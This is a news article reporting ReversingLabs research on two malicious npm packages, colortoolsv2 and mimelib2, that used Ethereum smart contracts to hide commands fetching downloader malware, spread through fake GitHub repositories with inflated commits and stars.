npm Malware Uses Ethereum Blockchain for Stealthy Attacks

In a stunning development, cybersecurity researchers have unveiled a new malware distribution technique targeting the nom ecosystem. Two malicious packages, uploaded to npm in July, have been found using the Ethereum blockchain. These packages cleverly leverage Ethereum smart contracts to conceal malicious commands, allowing the attackers to install downloader malware on compromised systems.

Ethereum Used for Malware Distribution

A sophisticated supply chain attack involved fake GitHub repositories and npm packages that utilized Ethereum smart contracts to distribute malware, potentially targeting individuals and organizations in the crypto space. According to researchers at ReversingLabs ,

"These latest attacks by threat actors, including the creation of sophisticated attacks using Ethereum blockchain and GitHub, show that attacks on repositories are evolving and that developers and development organizations alike need to be on the lookout for efforts to implant malicious code in legitimate applications, gain access to sensitive development assets and steal sensitive data and digital assets."

The security firm identified the two rogue nom codes as “colortoolsv2” and “mimelib2.” These contain the essential files to carry out illicit activities. The move highlights the malicious actors’ continuous efforts to find new ways to spread malware undetected. Addressing the matter, ReversingLabs researcher Lucija Valentić noted,

"The two npm packages abused smart contracts to conceal illegal commands that installed downloader malware on compromised systems.”

Sophisticated Attack

According to the software supply chain security firm, the malignant libraries are part of a broader, sophisticated campaign targeting both npm and GitHub, designed to deceive developers into downloading and executing them.

Notably, while the packages openly exhibit malicious functionality, the GitHub projects that import them are crafted to appear legitimate. They boasted multiple supposed contributors, thousands of code commits, and numerous stars – all artificially inflated using sockpuppet accounts created around the same time the fake npm codes emerged. Once incorporated into a project, the packages initiate illegal activity by fetching and executing a second-stage payload from a server controlled by the attackers. The analysts said,

“When we dug into the large number of commits and what was committed, it quickly became apparent that the code contributors were also fakes and that the actual number of commits had been inflated. In fact, there are thousands of commits and each day that number increases by a couple of thousand, indicating that the malicious actor has set up an infrastructure for automated commit pushing.”

This incident is part of a larger trend where hackers and illegal players are increasingly targeting cryptocurrency app developers. Especially, they face software supply chain attacks via open-source repositories. ReversingLabs identified that 32 such campaigns were involved in similar malignant code last year.